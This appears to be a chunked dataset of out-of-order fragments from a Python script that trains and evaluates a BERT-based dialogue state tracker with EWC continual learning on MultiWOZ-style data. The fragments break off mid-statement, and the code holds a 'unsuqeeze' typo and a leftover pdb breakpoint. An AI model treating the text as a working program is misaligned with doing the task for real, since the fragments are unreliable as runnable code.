"def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab separated value file.\"\"\" with open(input_file, \"r\",", "dev_loss += loss.item() * num_valid_turn dev_acc += acc.item() * num_valid_turn prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1)", "for l in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn else: for i, l", "nb_eval_examples_prev eval_acc_slot = eval_acc_slot / nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot =", "def get_labels(self): \"\"\"Gets the list of labels for this data set.\"\"\" raise NotImplementedError()", "eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \\ _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc,", "processor.target_slot_idx # wrong prev_slot_id = list(range(0, len(processor.prev_slot))) # List of slots in previous", "analysis on the test set.\") parser.add_argument(\"--do_lower_case\", action='store_true', help=\"Set this flag if you are", "set.\"\"\" raise NotImplementedError() def get_dev_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the", "def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation)", "+ prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is not None)", "tokens_b.pop() ############################################################################### # Miscellaneous functions ############################################################################### def accuracy(out, labels): outputs = np.argmax(out, axis=1)", "single set of features of data.\"\"\" def __init__(self, input_ids, input_len, label_id, prev_label_id): self.input_ids", "warmup: return x / warmup return 1.0 - x ############################################################################### # Main ###############################################################################", "= processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps = int(len(train_examples) / args.train_batch_size *", "','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i], global_step) tr_loss += loss.item() nb_tr_examples", "= {} for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)): total_acc_slot[idx] = val total_acc_slot", "prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev) for val in prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val", "attention_draw = 5 for input_ids, input_len, label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() ==", "for slot in self.target_slot] def get_prev_labels(self): \"\"\"See base class.\"\"\" return [ self.ontology[slot] for", "bert-large-cased, bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased, bert-base-chinese.\") parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The directory of the", "tokens_b, max_seq_length - 3) else: # Account for [CLS] and [SEP] with \"-", "# Initializes the distributed backend which will take care of sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl')", "return np.sum(outputs == labels) def warmup_linear(x, warmup=0.002): if x < warmup: return x", "all_input_ids.to(device), all_input_len.to(device), all_label_ids.to(device), all_prev_label_ids.to(device) logger.info(\"***** Running evaluation *****\") logger.info(\" Num examples = %d\",", "f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long) all_label_ids =", "dtype=torch.long) # reshape tensors to [batch, turn, word] all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length)", "parser.add_argument('--attn_head', type=int, default=4, help=\"the number of heads in multi-headed attention\") parser.add_argument(\"--do_train\", action='store_true', help=\"Whether", "output_eval_incorr_file = os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as writer: for dialog in incorrect_dialogs:", "dtype=torch.long) all_label_ids = torch.tensor([f.label_id for f in features], dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for", "train self.target_slot = [] self.prev_slot = [] self.target_slot_idx = sorted([ int(x) for x", "Example ***\") logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens: %s\" % \" \".join([str(x) for x", "+= prev_num_valid_turn dev_loss = dev_loss / nb_dev_examples dev_acc = dev_acc / nb_dev_examples prev_dev_loss", "= args.output_dir.split('/')[1] # Tensorboard logging if not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir,", "= [] for line in reader: if len(line) > 0 and line[0][0] ==", "self.target_slot = [] self.prev_slot = [] self.target_slot_idx = sorted([ int(x) for x in", "get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if n_gpu > 1: model", "prev_label_ids in tqdm(eval_dataloader, desc=\"Evaluating\"): if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len =", "ValueError(\"Can't find %s \" % vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case) num_train_steps = None", "sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\"", "parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total number of training epochs to perform.\") parser.add_argument(\"--patience\", default=10.0, type=float,", "config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for idx, domain in enumerate(ontology_items): slot, value = domain", "\"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"dev.tsv\")), \"dev\", accumulation) def get_test_examples(self, data_dir, accumulation=False):", "[], [] for labels in label_list: token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer, device)", "1: raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size =", "prev_nb_dev_examples = 0 for step, batch in enumerate(tqdm(dev_dataloader, desc=\"Validation\")): batch = tuple(t.to(device) for", "1 input_ids = tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up to the sequence length. input_ids +=", "Num examples = %d\", len(dev_examples)) logger.info(\" Batch size = %d\", args.dev_batch_size) logger.info(\" Num", "1: torch.save(model.state_dict(), output_model_file) else: torch.save(model.module.state_dict(), output_model_file) last_update = epoch best_loss = dev_loss best_acc", "prev_label_id): self.input_ids = input_ids self.input_len = input_len self.label_id = label_id self.prev_label_id = prev_label_id", "target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids \\ = all_input_ids.to(device), all_input_len.to(device),", "set to True.\\n\" \"0 (default value): dynamic loss scaling.\\n\" \"Positive power of 2:", "param_group['lr'] = lr_this_step optimizer.step() optimizer.zero_grad() global_step += 1 # Perform evaluation on validation", "line[2] # line[2]: user utterance text_b = line[3] # line[3]: system response label", "parser.add_argument('--load_path', type=str, default='', help='pretrained model directory name') parser.add_argument(\"--target_slot\", default='', type=str, required=True, help=\"Target slot", "validation *****\") logger.info(\" Num examples = %d\", len(dev_examples)) logger.info(\" Batch size = %d\",", "Account for [CLS] and [SEP] with \"- 2\" if len(tokens_a) > max_seq_length -", "slot.replace(' ','_'), dev_loss_slot[i]/nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i], global_step) for i, slot", "# reshape tensors to [batch, turn, word] all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len", "required=True, help='location of the data corpus') parser.add_argument(\"--bert_model\", default=None, type=str, required=True, help=\"Bert pre-trained model", "n_gpu == 1: if dev_loss_slot is None: dev_loss_slot = [ l * num_valid_turn", "parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn', type=str, required=True, help=\"nbt type: rnn", "'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot =[] prev_slot = [] for key, value in", "+ [\"[SEP]\"] input_len = [len(tokens), 0] if tokens_b: tokens += tokens_b + [\"[SEP]\"]", "logger.info(\" Batch size = %d\", args.dev_batch_size) logger.info(\" Num steps = %d\", num_dev_steps) all_input_ids_dev,", "input_len])) logger.info(\"label: \" + label_info) logger.info(\"previous label: \" + prev_label_info) curr_dialogue_idx = example.guid.split('-')[1]", "for simple sequence classification.\"\"\" def __init__(self, guid, text_a, text_b=None, label=None, prev_label=None): self.guid =", "all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len = all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1,", "help=\"Previous trained slots. ex. '0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--tf_dir\",", "input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if", "loss_slot is not None: if eval_loss_slot is None: eval_loss_slot = [ l *", "import tqdm, trange import numpy as np import torch from torch.utils.data import TensorDataset,", "slots self.ontology = collections.OrderedDict(sorted(ontology.items())) # select slots to train self.target_slot = [] self.prev_slot", "None or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id, prev_label_id=prev_label_id, )) prev_dialogue_idx = curr_dialogue_idx", "all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim) return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer, device):", "1 if (step + 1) % args.gradient_accumulation_steps == 0: # modify learning rate", "break text = {} text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label'] = [str(label_list[idx][x])", "loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss =", "of features of data.\"\"\" def __init__(self, input_ids, input_len, label_id, prev_label_id): self.input_ids = input_ids", "0 dev_acc = 0 dev_loss_slot, dev_acc_slot = None, None nb_dev_examples, nb_dev_steps = 0,", "= 0, 0 prev_eval_loss_slot, prev_eval_acc_slot = None, None nb_eval_examples_prev = 0 for input_ids,", "for (ex_index, example) in enumerate(examples): tokens_a = [x if x != '#' else", "parser.add_argument(\"--nbt\", default='rnn', type=str, required=True, help=\"nbt type: rnn or transformer or turn\" ) parser.add_argument(\"--fix_utterance_encoder\",", "directory where the model predictions and checkpoints will be written.\") parser.add_argument('--load_path', type=str, default='',", "help=\"random seed for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help=\"Number of updates steps to accumulate", "acc_slot = acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu,", "all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len,", "torch.load(output_model_file, map_location=device) del_list = [] for key in ptr_model.keys(): if ('slot' in key)", "pred_slot[0][turn][slot]: class_correct[slot][label_ids[0][turn][slot]] +=1 drawfig = False print('hotel') print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1))", "rate warmup for. \" \"E.g., 0.1 = 10%% of training.\") parser.add_argument(\"--lambda_ewc\", default=0.1, type=float,", "slot name 'attraction'\" ) parser.add_argument(\"--prev_slot\", default='', type=str, required=True, help=\"Previous trained slots. ex. '0:1:2", "!= -1), args.fp16)) if args.gradient_accumulation_steps < 1: raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should", "type=int, default=4, help=\"the number of heads in multi-headed attention\") parser.add_argument(\"--do_train\", action='store_true', help=\"Whether to", "== 1: dialog = [] for input, label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]):", "num_valid_turn prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1, 0).item() prev_dev_loss += prev_loss.item() * prev_num_valid_turn prev_dev_acc", "range(num_labels[i])] for i in range(len(num_labels))] eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids =", "optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters,", "len(val)-1 for val in label_list] incorrect_dialogs = [] attention_draw = 5 for input_ids,", "type=str, required=True, help=\"nbt type: rnn or transformer or turn\" ) parser.add_argument(\"--fix_utterance_encoder\", action='store_true', help=\"Do", "[] self.prev_slot = [] self.target_slot_idx = sorted([ int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx", "1) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run prediction for full data eval_sampler", "max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim) return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids def", "EWC: calculate Fisher ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch", "prev_acc_slot * prev_num_valid_turn nb_dev_examples += num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss = dev_loss /", "with torch.no_grad(): _, _, acc, _, pred_slot = model(input_ids, input_len, label_ids, 1) nturn", "key in ptr_model.keys(): if ('slot' in key) or ('value' in key): del_list.append(key) for", "prev_dev_acc_slot[i], global_step) logger.info(\"*** Model Updated: Epoch=%d, Valid loss=%.6f, Valid acc=%.6f, Valid prev loss=%.6f,", "############################################################################### if args.do_analyze and (args.local_rank == -1 or torch.distributed.get_rank() == 0): pdb.set_trace() def", "for key in sorted(result.keys()): logger.info(\" %s = %s\", key, str(result[key])) writer.write(\"%s = %s\\n\"", "from pytorch_pretrained_bert.tokenization import BertTokenizer from pytorch_pretrained_bert.optimization import BertAdam from tensorboardX import SummaryWriter import", "trained slots in previous tasks class InputFeatures(object): \"\"\"A single set of features of", "= model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss, loss_slot, acc, acc_slot, _ =", "of `InputExample`s for the train set.\"\"\" raise NotImplementedError() def get_dev_examples(self, data_dir): \"\"\"Gets a", "!= -1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex = (label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples += nb_eval_ex", "+= class_acc nlabels += 1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc", "the case that slot and values are different between the training and evaluation", "{'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss, 'eval_loss_slot':'\\t'.join([ str(val/ nb_eval_examples) for val in eval_loss_slot]),", "= None accumulation = False if args.do_train: train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples =", "% \" \".join([str(x) for x in input_len])) logger.info(\"label: \" + label_info) logger.info(\"previous label:", "= [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding", "tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else: # Account for [CLS] and [SEP]", "x in input_len])) logger.info(\"label: \" + label_info) logger.info(\"previous label: \" + prev_label_info) curr_dialogue_idx", "value, class_acc) ) slot_class_acc += class_acc nlabels += 1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value,", "selected in the list: bert-base-uncased, \" \"bert-large-uncased, bert-base-cased, bert-large-cased, bert-base-multilingual-uncased, \" \"bert-base-multilingual-cased, bert-base-chinese.\")", "install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") model = DDP(model)", "if dev_loss_slot is None: dev_loss_slot = [ l * num_valid_turn for l in", "for val in prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for", "required=True, help=\"Target slot idx to train model. ex. '0:1:2 or an excluding slot", "from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") model = DDP(model) elif n_gpu", "parser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run training.\") parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to run eval on", "will be truncated, and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_label_length\",", "lens = get_label_embedding(labels, args.max_label_length, tokenizer, device) label_token_ids.append(token_ids) label_len.append(lens) ## Get slot-type embeddings ##", "args.warmup_proportion) if summary_writer is not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in optimizer.param_groups:", "+= acc_slot * num_valid_turn for i, l in enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i] +", "self.target_slot_idx = sorted([ int(x) for x in config.target_slot.split(':')]) self.prev_slot_idx = sorted([ int(x) for", "if args.fp16: model.half() # Load pretrained model # in the case that slot", "= acc.mean() acc_slot = acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc", "prev loss=%.6f, Valid prev acc=%.6f ***\" \\ % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc))", "default=22, type=int, help=\"The maximum total input turn length. \\n\" \"Sequences longer than this", "/ nb_dev_examples dev_acc = dev_acc / nb_dev_examples prev_dev_loss = prev_dev_loss / prev_nb_dev_examples prev_dev_acc", "for f in features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device)", "max_grad_norm=1.0) if args.loss_scale == 0: optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer,", "f in features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for f in features], dtype=torch.long).to(device) return", "nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot = {} for val, idx in", "= acc_slot.mean(0) loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc if", "get_dev_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the dev set.\"\"\" raise NotImplementedError()", "json if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology", "tab separated value file.\"\"\" with open(input_file, \"r\", encoding='utf-8') as f: reader = csv.reader(f,", "ontology[slot].append(\"none\") fp_ontology.close() if not config.target_slot == 'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\", "return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\"", "parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number", "= prev_eval_loss / nb_eval_examples_prev prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot = eval_acc_slot /", "labels for this data set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads", "should be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps) # Set the", "value in enumerate(slot): if not value == 0: class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid],", "and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument(\"--max_turn_length\", default=22, type=int, help=\"The", "a collection of `InputExample`s for the train set.\"\"\" raise NotImplementedError() def get_dev_examples(self, data_dir):", "x in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for idx, domain in enumerate(ontology_items): slot, value", "<= epoch: break ############################################################################### # Evaluation ############################################################################### # Test output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\")", "examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length,", "loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot,", "_create_examples(self, lines, set_type, accumulation=False): \"\"\"Creates examples for the training and dev sets.\"\"\" prev_dialogue_index", "reshape tensors to [batch, turn, word] all_input_ids = all_input_ids.view(-1, max_turn_length, max_seq_length) all_input_len =", "full data eval_sampler = SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id =", "plt import seaborn seaborn.set_context(context=\"talk\") logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S',", "elif args.nbt == 'transformer': from BeliefTrackerSlotQueryMultiSlotTransformer import BeliefTracker from BeliefTrackerSlotQueryMultiSlotEWC import EWC else:", "output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as writer: total_class_acc = 0", "all_input_len = all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1,", "parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial", "self.target_slot logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot)) logger.info('Processor: target slots: '+ ',", "BertAdam from tensorboardX import SummaryWriter import pdb import matplotlib.pyplot as plt import seaborn", "\"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str, required=True, help=\"The output directory where the model", "= model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean() acc = acc.mean() acc_slot", "{} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format( device, n_gpu, bool(args.local_rank !=", "else: eval_acc_slot += acc_slot * nb_eval_ex return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot,", "comments (starting with '#') continue lines.append(line) return lines class Processor(DataProcessor): \"\"\"Processor for the", "label_info features = [] prev_dialogue_idx = None all_padding = [0] * max_seq_length all_padding_len", "'\\t' for label, pred in zip(turn['label'], turn['pred']): text += '%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\" %", "torch.manual_seed(args.seed) if n_gpu > 0: torch.cuda.manual_seed_all(args.seed) if not args.do_train and not args.do_eval and", "= [0] prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss = prev_eval_loss", "= logging.getLogger(__name__) ############################################################################### # Data Preprocessing ############################################################################### class InputExample(object): \"\"\"A single training/test example", "Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total input sequence length after WordPiece", "def warmup_linear(x, warmup=0.002): if x < warmup: return x / warmup return 1.0", "using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this flag if you want to", "default=32, type=int, help=\"The maximum total input sequence length after WordPiece tokenization. \\n\" \"Sequences", "return optimizer_grouped_parameters if n_gpu == 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module)", "flag if you are using an uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this flag", "x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length - 3) else: # Account for [CLS]", "= collections.OrderedDict(sorted(ontology.items())) # select slots to train self.target_slot = [] self.prev_slot = []", "global_step) summary_writer.add_scalar(\"Validate/Acc_%s\" % slot.replace(' ','_'), dev_acc_slot[i], global_step) for i, slot in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\"", "ImportError( \"Please install apex from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") optimizer", "dev_loss_slot, dev_acc_slot = None, None nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss = 0", "ax): seaborn.heatmap(data, xticklabels=x, square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct = [[0 for", "config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for slot", "for dialog in incorrect_dialogs: for turn in dialog: text = turn['input'] + '\\t'", "__init__(self, config): super(Processor, self).__init__() import json if config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology", "{} text['input'] = ' '.join(tokenizer.convert_ids_to_tokens(input.cpu().numpy())).replace(' [PAD]', '') text['label'] = [str(label_list[idx][x]) for idx, x", "prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if eval_loss_slot is None: #", "* prev_num_valid_turn else: for i, l in enumerate(loss_slot): dev_loss_slot[i] = dev_loss_slot[i] + l", "SequentialSampler(eval_data) eval_dataloader = DataLoader(eval_data, sampler=eval_sampler, batch_size=1) model.eval() none_value_id = [ len(val)-1 for val", "open(output_eval_file, \"w\") as writer: logger.info(\"***** Eval results *****\") for key in sorted(result.keys()): logger.info(\"", "ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size /", "n_gpu > 1: model = torch.nn.DataParallel(model) # Prepare optimizer if args.do_train: def get_optimizer_grouped_parameters(model):", "= list(range(len(processor.prev_slot), len(processor.all_slot))) # list of slots in present task # tokenizer vocab_dir", "model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len,", "epoch in trange(1): #### TRAIN model.train() tr_loss = 0 nb_tr_examples, nb_tr_steps = 0,", "argparse import random import collections import operator from tqdm import tqdm, trange import", "Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" % (epoch, dev_loss, dev_acc)) #if epoch", "all_label_ids.to(device) logger.info(\"***** Running analysis *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch", "label_padding = [0] * (max_seq_length - len(label_token_ids)) label_token_ids += label_padding assert len(label_token_ids) ==", "-1).sum().item() nb_eval_examples += nb_eval_ex nb_eval_steps += 1 def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss,", "# Save a trained model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") if args.do_train: if n_gpu", "lines.append(line) return lines class Processor(DataProcessor): \"\"\"Processor for the belief tracking dataset (GLUE version).\"\"\"", "in enumerate(processor.prev_slot): summary_writer.add_scalar(\"Validate/Prev_Loss_%s\" % slot.replace(' ','_'), prev_dev_loss_slot[i]/prev_nb_dev_examples, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc_%s\" % slot.replace(' ','_'), prev_dev_acc_slot[i],", "default=None, type=str, required=True, help=\"The output directory where the model predictions and checkpoints will", "desc=\"Epoch\"): # for epoch in trange(1): #### TRAIN model.train() tr_loss = 0 nb_tr_examples,", "= ontology[\"informable\"] del ontology[\"request\"] for slot in ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close()", "line in reader: if len(line) > 0 and line[0][0] == '#': # ignore", "new_key = key.replace('rnn.', 'nbt.') ptr_model[new_key] = ptr_model[key] del ptr_model[key] state = model.state_dict() state.update(ptr_model)", "dev_acc_slot += acc_slot * num_valid_turn for i, l in enumerate(prev_loss_slot): prev_dev_loss_slot[i] = prev_dev_loss_slot[i]", "= prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev", "del ptr_model[key] if n_gpu > 1: model = model.module state = model.state_dict() state.update(ptr_model)", "sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss / nb_tr_steps if args.do_train else None result =", "the dev set.\"\"\" raise NotImplementedError() def get_labels(self): \"\"\"Gets the list of labels for", "input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length", "default='rnn', type=str, required=True, help=\"nbt type: rnn or transformer or turn\" ) parser.add_argument(\"--fix_utterance_encoder\", action='store_true',", "quotechar=quotechar) lines = [] for line in reader: if len(line) > 0 and", "= 0 dev_acc = 0 dev_loss_slot, dev_acc_slot = None, None nb_dev_examples, nb_dev_steps =", "scaling.\\n\" \"Positive power of 2: static loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to", "dialogue index, line[1]: turn index if accumulation: if prev_dialogue_index is None or prev_dialogue_index", "logger.info(\"Training...\") global_step = 0 last_update = None best_loss = None #### EWC: calculate", "zip(turn['label'], turn['pred']): text += '%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\" % text) writer.write(\"---------- \\n\") logger.info(\"Done analysis:", "test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run analysis on the test set.\") parser.add_argument(\"--do_lower_case\",", "all_prev_label_ids_dev) dev_sampler = 